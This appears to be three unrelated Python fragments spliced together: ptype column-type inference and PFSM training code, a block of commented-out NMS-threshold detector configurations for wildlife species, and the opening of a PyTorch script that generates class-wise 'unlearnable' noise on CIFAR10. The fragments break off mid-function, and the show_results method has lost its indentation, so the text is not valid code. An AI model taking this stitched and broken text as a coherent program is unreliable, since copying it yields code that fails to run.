    :param _column_names: explicit column names for dataframes without them.
    """
    if _dataset_name is None:
        _dataset_name = 'demo'
    _data_frame = _data_frame.rename(columns=lambda n: str(n).replace(' ', ''))
    _data_frame = _data_frame.applymap(str)

    # Refresh the per-column outputs. (The original initialized
    # missing_types / anomaly_types / p_z_columns / p_t_columns /
    # predicted_types twice; one pass is sufficient.)
    self.all_posteriors[_dataset_name] = {}
    self.predicted_types = {}
    self.normal_types = {}
    self.missing_types = {}
    self.anomaly_types = {}
    self.p_z_columns = {}
    self.p_t_columns = {}
    self.print = False
    self.prediction_path = None

    # Check for dataframes without column names
    if _column_names is None:
        _column_names = _data_frame.columns

    # Creates a configuration object for the experiments; only pass the
    # type inventory when one has been set.
    if self.types is None:
        config = Config(_dataset_name=_dataset_name, _column_names=_column_names)
    else:
        config = Config(_dataset_name=_dataset_name, _column_names=_column_names, _types=self.types)

    # Ptype model for inference: create once, then just update parameters.
    if self.model is None:
        self.model = PtypeModel(config, _data_frame=_data_frame)
    else:
        self.model.set_params(config, _data_frame=_data_frame)
###################### MAIN METHODS #######################
def run_inference_on_model(self, probs, counts):
    """Delegate one column's inference to the underlying model, logging when verbose."""
    verbose = self.print
    if verbose:
        print_to_file('\tinference is running...')
    self.model.run_inference(probs, counts)
def run_inference(self, _data_frame, _print=False, _prediction_path=None, _save=False):
    """ Runs ptype for each column in a dataframe.
        The outputs are stored in dictionaries (see store_outputs).
        The column types are saved to a csv file.

    :param _data_frame: input dataframe whose column types are inferred.
    :param _print: when True, progress is logged via print_to_file.
    :param _prediction_path: destination path stored for prediction output.
    :param _save: when True, write the predicted column types to csv.
    """
    # Stringifies the data and resets the per-column output stores.
    self.set_data(_data_frame=_data_frame)
    self.print = _print
    self.prediction_path = _prediction_path
    if self.print:
        print_to_file('processing ' + self.model.experiment_config.dataset_name)
    # Normalizing the parameters to make sure they're probabilities
    self.normalize_params()
    # Generates a binary mask matrix to check if a word is supported by a
    # PFSM or not. (this is just to optimize the implementation.)
    self.PFSMRunner.update_values(np.unique(self.model.data.values))
    # Per-column pipeline: probabilities -> inference -> stored outputs.
    for i, column_name in enumerate(list(self.model.experiment_config.column_names)):
        # self.setup_a_column(i, column_name)
        # Calculates the probabilities
        probabilities, counts = self.generate_probs_a_column(column_name)
        # Runs inference for a column
        self.run_inference_on_model(probabilities, counts)
        # Stores types, both cols types and rows types
        self.store_outputs(column_name)
    # Export column types, and missing data
    if _save:
        self.write_type_predictions_2_csv(list(self.predicted_types.values()))
def train_all_models_multiple_dfs(self, runner):
    """Run one training pass of every PFSM over all stored dataframes and return the updated runner."""
    if self.print:
        print_to_file('\ttraining is running...')
    updated_runner = self.model.train_all_z_multiple_dfs_new(runner)
    return updated_runner
def train_machines_multiple_dfs(self, _labels, _experiment_output_name='demo',_max_iter=20, _prediction_path=None, _print=False, _test_data=None, _test_labels=None, _uniformly=False):
    """ Train the PFSMs given a set of dataframes and their labels

    NOTE(review): nearly identical to train_machines_multiple_dfs_new; the
    differences are the convergence threshold (1e-4 here vs 1e-2) and when
    the runner checkpoint is saved relative to the convergence check.

    :param _labels: column types labeled by hand, where _label[i][j] denotes the type of j^th column in i^th dataframe.
    :param _experiment_output_name: prefix used for checkpoint (.pkl) and log files.
    :param _max_iter: the maximum number of iterations the optimization algorithm runs as long as it's not converged.
    :param _prediction_path: stored on self; not otherwise used in this method.
    :param _print: when True, progress is logged via print_to_file.
    :param _test_data: not used by this method.
    :param _test_labels: not used by this method.
    :param _uniformly: a binary variable used to initialize the PFSMs - True allows initializing uniformly rather than using hand-crafted values.
    :return: None; trained runner and error history are saved to .pkl files.
    """
    self.print = _print
    self.prediction_path = _prediction_path
    self.experiment_output_name = _experiment_output_name
    if _uniformly:
        self.initialize_params_uniformly()
    # Setup folders and probabilities for all columns
    self.normalize_params()
    # Changing column names (spaces removed, mirroring set_data)
    self.data_frames = [data_frame.rename(columns=lambda n: str(n).replace(' ', '')) for data_frame in self.data_frames]
    self.model.data_frames = self.data_frames
    # find the unique values in all of the columns once
    for i, df in enumerate(self.model.data_frames):
        if i == 0:
            unique_vals = np.unique(df.values)
        else:
            unique_vals = np.concatenate((unique_vals, np.unique(df.values)))
    self.model.unique_vals = unique_vals
    self.PFSMRunner.set_unique_values(unique_vals)
    # Finding unique values and their counts, per dataframe and column
    self.model.dfs_unique_vals_counts = {}
    for i, df in enumerate(self.data_frames):
        df_unique_vals_counts = {}
        for column_name in list(df.columns):
            temp_x, counts = np.unique([str(int_element) for int_element in df[column_name].tolist()], return_counts=True)
            counts = {u_data: c for u_data, c in zip(temp_x, counts)}
            temp_counts = list(counts.values())
            counts_array = np.reshape(temp_counts, newshape=(len(temp_counts),))
            df_unique_vals_counts[column_name] = [temp_x, counts_array]
        self.model.dfs_unique_vals_counts[str(i)] = df_unique_vals_counts
    # Setting model hyperparameters for training
    self.model.labels = _labels
    self.model.types = self.types
    self.model.J = len(self.PFSMRunner.machines)  # J: num of data types including missing and anomaly.
    self.model.K = self.model.J - 2  # K: num of possible column data types (excluding missing and anomaly)
    self.model.pi = [self.model.PI for j in range(self.model.K)]  # mixture weights of row types
    self.model.current_runner = self.PFSMRunner
    # Error before any training, plus an initial runner checkpoint.
    training_error = []
    training_error.append(self.calculate_error_df(self.data_frames, _labels))
    save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner_initial.pkl')
    print(training_error)
    # Iterates over whole data points
    for it in range(_max_iter):
        print_to_file('iteration = ' + str(it), filename=self.experiment_output_name + '_output.txt')
        # Trains machines using all of the training data frames
        self.PFSMRunner = self.train_all_models_multiple_dfs(self.PFSMRunner)
        self.model.current_runner = self.PFSMRunner
        # Calculate training and validation error at each iteration
        training_error.append(self.calculate_error_df(self.data_frames, _labels))
        print(training_error)
        # Checkpoint the runner every iteration (before the convergence test).
        save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner' + str(it) + '.pkl')
        if it > 0:
            # Stop when the error improvement drops below 1e-4.
            if (training_error[-2] - training_error[-1] < 1e-4):
                print_to_file('converged!', filename=self.experiment_output_name + '_output.txt')
                break
    save_object(training_error, self.experiment_output_name + '_training_error.pkl')
def train_machines_multiple_dfs_new(self, _labels, _experiment_output_name='demo',_max_iter=20, _prediction_path=None, _print=False, _test_data=None, _test_labels=None, _uniformly=False):
    """ Train the PFSMs given a set of dataframes and their labels

    NOTE(review): nearly identical to train_machines_multiple_dfs; the
    differences are a looser convergence threshold (1e-2 vs 1e-4) and that
    the per-iteration runner checkpoint is saved after the convergence
    check (and once more on convergence, just before breaking).

    :param _labels: column types labeled by hand, where _label[i][j] denotes the type of j^th column in i^th dataframe.
    :param _experiment_output_name: prefix used for checkpoint (.pkl) and log files.
    :param _max_iter: the maximum number of iterations the optimization algorithm runs as long as it's not converged.
    :param _prediction_path: stored on self; not otherwise used in this method.
    :param _print: when True, progress is logged via print_to_file.
    :param _test_data: not used by this method.
    :param _test_labels: not used by this method.
    :param _uniformly: a binary variable used to initialize the PFSMs - True allows initializing uniformly rather than using hand-crafted values.
    :return: None; trained runner and error history are saved to .pkl files.
    """
    self.print = _print
    self.prediction_path = _prediction_path
    self.experiment_output_name = _experiment_output_name
    if _uniformly:
        self.initialize_params_uniformly()
    # Setup folders and probabilities for all columns
    self.normalize_params()
    # Changing column names (spaces removed, mirroring set_data)
    self.data_frames = [data_frame.rename(columns=lambda n: str(n).replace(' ', '')) for data_frame in self.data_frames]
    self.model.data_frames = self.data_frames
    # find the unique values in all of the columns once
    for i, df in enumerate(self.model.data_frames):
        if i == 0:
            unique_vals = np.unique(df.values)
        else:
            unique_vals = np.concatenate((unique_vals, np.unique(df.values)))
    self.model.unique_vals = unique_vals
    self.PFSMRunner.set_unique_values(unique_vals)
    # Finding unique values and their counts, per dataframe and column
    self.model.dfs_unique_vals_counts = {}
    for i, df in enumerate(self.data_frames):
        df_unique_vals_counts = {}
        for column_name in list(df.columns):
            temp_x, counts = np.unique([str(int_element) for int_element in df[column_name].tolist()], return_counts=True)
            counts = {u_data: c for u_data, c in zip(temp_x, counts)}
            temp_counts = list(counts.values())
            counts_array = np.reshape(temp_counts, newshape=(len(temp_counts),))
            df_unique_vals_counts[column_name] = [temp_x, counts_array]
        self.model.dfs_unique_vals_counts[str(i)] = df_unique_vals_counts
    # Setting model hyperparameters for training
    self.model.labels = _labels
    self.model.types = self.types
    self.model.J = len(self.PFSMRunner.machines)  # J: num of data types including missing and anomaly.
    self.model.K = self.model.J - 2  # K: num of possible column data types (excluding missing and anomaly)
    self.model.pi = [self.model.PI for j in range(self.model.K)]  # mixture weights of row types
    self.model.current_runner = self.PFSMRunner
    # Error before any training, plus an initial runner checkpoint.
    training_error = []
    training_error.append(self.calculate_error_df(self.data_frames, _labels))
    save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner_initial.pkl')
    print(training_error)
    # Iterates over whole data points
    for it in range(_max_iter):
        print_to_file('iteration = ' + str(it), filename=self.experiment_output_name + '_output.txt')
        # Trains machines using all of the training data frames
        self.PFSMRunner = self.train_all_models_multiple_dfs(self.PFSMRunner)
        self.model.current_runner = self.PFSMRunner
        # Calculate training and validation error at each iteration
        training_error.append(self.calculate_error_df(self.data_frames, _labels))
        print(training_error)
        if it > 0:
            # Stop when the error improvement drops below 1e-2.
            if (training_error[-2] - training_error[-1] < 1e-2):
                print_to_file('converged!', filename=self.experiment_output_name + '_output.txt')
                save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner' + str(it) + '.pkl')
                break
        # Checkpoint the runner every non-converged iteration.
        save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner' + str(it) + '.pkl')
    save_object(training_error, self.experiment_output_name + '_training_error.pkl')
####################### OUTPUT METHODS #########################
def show_results_df(self,):
    """Return a copy of the model's data with each column label suffixed by its predicted type."""
    annotated = self.model.data.copy()

    def _tag(col):
        # Lookup key is the space-stripped column name used at inference time.
        predicted = self.predicted_types[str(col).replace(' ', '')]
        return col + '(' + predicted + ')'

    annotated.columns = annotated.columns.map(_tag)
    return annotated
def show_results(self, cols=None):
if cols is None:
cols = self.predicted_types
for col in cols:
print('col: ' + col)
print('\tpredicted type: ' + self.predicted_types[col])
print('\tposterior probs: ', self.all_posteriors[self.model.experiment_config.dataset_name][col])
print('\ttypes: ', list(self.types.values()), '\n')
unique_vals, unique_vals_counts = np.unique([str(int_element) for int_element in self.model.data[col].tolist()], return_counts=True)
indices = self.normal_types[col]
if len(indices) == 0:
count_normal = 0
pass
else:
some_normal_data_values = [unique_vals[ind] for ind in indices][:20]
some_normal_data_values_counts = [unique_vals_counts[ind] for ind in indices][:20]
count_normal = sum(unique_vals_counts[indices])
if len(self.missing_types[col]) == 0:
count_missing = 0
pass
else:
indices = self.missing_types[col]
missing_values = [unique_vals[ind] for ind in indices][:20]
missing_values_counts = [unique_vals_counts[ind] for ind in indices][:20]
count_missing = sum(unique_vals_counts[indices])
if len(self.anomaly_types[col]) == 0:
count_anomalies = 0
pass
else:
indices = self.anomaly_types[col]
anomalies = [unique_vals[ind] for ind in indices]
anomalies_counts = [unique_vals_counts[ind] for ind in indices]
count_anomalies = sum(unique_vals_counts[indices])
if self.normal_types[col] != []:
print('\tsome normal data values: ', some_normal_data_values)
print('\ttheir counts: ', some_normal_data_values_counts)
print('\tfraction of normal:', round(count_normal / (count_normal + count_missing + count_anomalies), 2), '\n')
if self.missing_types[col] != []:
print('\tmissing values:', missing_values)
print('\ttheir counts: ', missing_values_counts)
print('\tfraction of missing:', round(count_missing / (count_normal + count_missing + count_anomalies), 2), '\n')
if self.anomaly_types[col] != []:
print('\tanomalies:', anomalies)
print('\ttheir | |
Head NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.00, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.10, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.20, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.30, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.50, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.60, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.70, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.80, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.90, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 1.00, 'species_set' : set(['turtle_hawksbill+head'])},
# ],
# {},
# ),
# 'hammerhead': (
# [
# {'label': 'Hammerhead NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.00, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.10, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.20, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.30, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.50, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.60, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.70, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.80, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.90, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 1.00, 'species_set' : set(['shark_hammerhead'])},
# ],
# {},
# ),
# '!hammerhead': (
# [
# {'label': 'Hammerhead NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.00, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.10, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.20, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.30, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.50, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.60, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.70, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.80, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.90, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 1.00, 'species_set' : set(['!shark_hammerhead'])},
# ],
# {'offset_color': 1},
# ),
# 'ggr2-giraffe-lightnet': (
# [
# {'label': 'Giraffe NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.00, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.10, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.20, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.30, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.40, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.50, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.60, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.70, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.80, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.90, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 1.00, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# ],
# {},
# ),
# 'ggr2-zebra-lightnet': (
# [
# {'label': 'Zebra NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.00, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.10, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.20, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.30, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.40, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, | |
import argparse
import collections
import datetime
import os
import shutil
import time
import dataset
import mlconfig
import toolbox
import torch
import util
import madrys
import numpy as np
from evaluator import Evaluator
from tqdm import tqdm
from trainer import Trainer
mlconfig.register(madrys.MadrysLoss)

# General Options
parser = argparse.ArgumentParser(description='ClasswiseNoise')
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--version', type=str, default="resnet18")
parser.add_argument('--exp_name', type=str, default="test_exp")
parser.add_argument('--config_path', type=str, default='configs/cifar10')
parser.add_argument('--load_model', action='store_true', default=False)
parser.add_argument('--data_parallel', action='store_true', default=False)
# Datasets Options
# Fix: the help strings for the batch-size options were copy-pasted from
# --step_size ('perturb step size'); describe what the flags actually do.
parser.add_argument('--train_batch_size', default=512, type=int, help='batch size for training')
parser.add_argument('--eval_batch_size', default=512, type=int, help='batch size for evaluation')
parser.add_argument('--num_of_workers', default=8, type=int, help='workers for loader')
parser.add_argument('--train_data_type', type=str, default='CIFAR10')
parser.add_argument('--train_data_path', type=str, default='../datasets')
parser.add_argument('--test_data_type', type=str, default='CIFAR10')
parser.add_argument('--test_data_path', type=str, default='../datasets')
# Perturbation Options
parser.add_argument('--universal_train_portion', default=0.2, type=float)
parser.add_argument('--universal_stop_error', default=0.5, type=float)
parser.add_argument('--universal_train_target', default='train_subset', type=str)
parser.add_argument('--train_step', default=10, type=int)
parser.add_argument('--use_subset', action='store_true', default=False)
parser.add_argument('--attack_type', default='min-min', type=str, choices=['min-min', 'min-max', 'random'], help='Attack type')
parser.add_argument('--perturb_type', default='classwise', type=str, choices=['classwise', 'samplewise'], help='Perturb type')
parser.add_argument('--patch_location', default='center', type=str, choices=['center', 'random'], help='Location of the noise')
parser.add_argument('--noise_shape', default=[10, 3, 32, 32], nargs='+', type=int, help='noise shape')
parser.add_argument('--epsilon', default=8, type=float, help='perturbation')
parser.add_argument('--num_steps', default=1, type=int, help='perturb number of steps')
parser.add_argument('--step_size', default=0.8, type=float, help='perturb step size')
parser.add_argument('--random_start', action='store_true', default=False)
args = parser.parse_args()

# Convert epsilon/step size from pixel units [0, 255] to [0, 1].
args.epsilon = args.epsilon / 255
args.step_size = args.step_size / 255

# Set up Experiments
if args.exp_name == '':
    # Bug fix: a datetime object cannot be concatenated to a str, so the old
    # code ('exp_' + datetime.datetime.now()) raised TypeError. Format a
    # filesystem-safe timestamp instead.
    args.exp_name = 'exp_' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
exp_path = os.path.join(args.exp_name, args.version)
log_file_path = os.path.join(exp_path, args.version)
checkpoint_path = os.path.join(exp_path, 'checkpoints')
checkpoint_path_file = os.path.join(checkpoint_path, args.version)
util.build_dirs(exp_path)
util.build_dirs(checkpoint_path)
logger = util.setup_logger(name=args.version, log_file=log_file_path + ".log")

# CUDA Options
logger.info("PyTorch Version: %s" % (torch.__version__))
if torch.cuda.is_available():
    torch.cuda.manual_seed(args.seed)
    torch.backends.cudnn.enabled = True
    torch.backends.cudnn.benchmark = True
    device = torch.device('cuda')
    device_list = [torch.cuda.get_device_name(i) for i in range(0, torch.cuda.device_count())]
    logger.info("GPU List: %s" % (device_list))
else:
    device = torch.device('cpu')

# Load Exp Configs
config_file = os.path.join(args.config_path, args.version) + '.yaml'
config = mlconfig.load(config_file)
config.set_immutable()
for key in config:
    logger.info("%s: %s" % (key, config[key]))
shutil.copyfile(config_file, os.path.join(exp_path, args.version + '.yaml'))
def train(starting_epoch, model, optimizer, scheduler, criterion, trainer, evaluator, ENV, data_loader):
    """Run the train/eval loop from ``starting_epoch`` until ``config.epochs``.

    Per epoch: one training pass, an LR-scheduler step, one evaluation pass,
    bookkeeping of accuracy history in ``ENV``, and a model checkpoint.
    """
    for epoch in range(starting_epoch, config.epochs):
        logger.info("")
        logger.info("="*20 + "Training Epoch %d" % (epoch) + "="*20)

        # Training pass for this epoch.
        ENV['global_step'] = trainer.train(epoch, model, criterion, optimizer)
        ENV['train_history'].append(trainer.acc_meters.avg*100)
        scheduler.step()

        # Evaluation pass.
        logger.info("="*20 + "Eval Epoch %d" % (epoch) + "="*20)
        evaluator.eval(epoch, model)
        eval_acc_pct = evaluator.acc_meters.avg*100
        eval_summary = ('Eval Loss:%.4f\tEval acc: %.2f' % (evaluator.loss_meters.avg, eval_acc_pct))
        logger.info(eval_summary)
        ENV['eval_history'].append(eval_acc_pct)
        # NOTE(review): the key name 'curren_acc' (sic) is kept as-is because
        # other code may read it.
        ENV['curren_acc'] = eval_acc_pct

        # Reset running statistics for the next epoch.
        trainer._reset_stats()
        evaluator._reset_stats()

        # Checkpoint: unwrap DataParallel so the raw module is saved.
        model_to_save = model.module if args.data_parallel else model
        util.save_model(ENV=ENV, epoch=epoch, model=model_to_save,
                        optimizer=optimizer, scheduler=scheduler,
                        filename=checkpoint_path_file)
        logger.info('Model Saved at %s', checkpoint_path_file)
def universal_perturbation_eval(noise_generator, random_noise, data_loader, model, eval_target=args.universal_train_target):
    """Evaluate ``model`` on ``eval_target`` with class-wise noise applied.

    Args:
        noise_generator: exposes ``_patch_noise_extend_to_img`` to place a
            class's noise patch onto an image.
        random_noise: per-class noise indexed by label, or None for a clean pass.
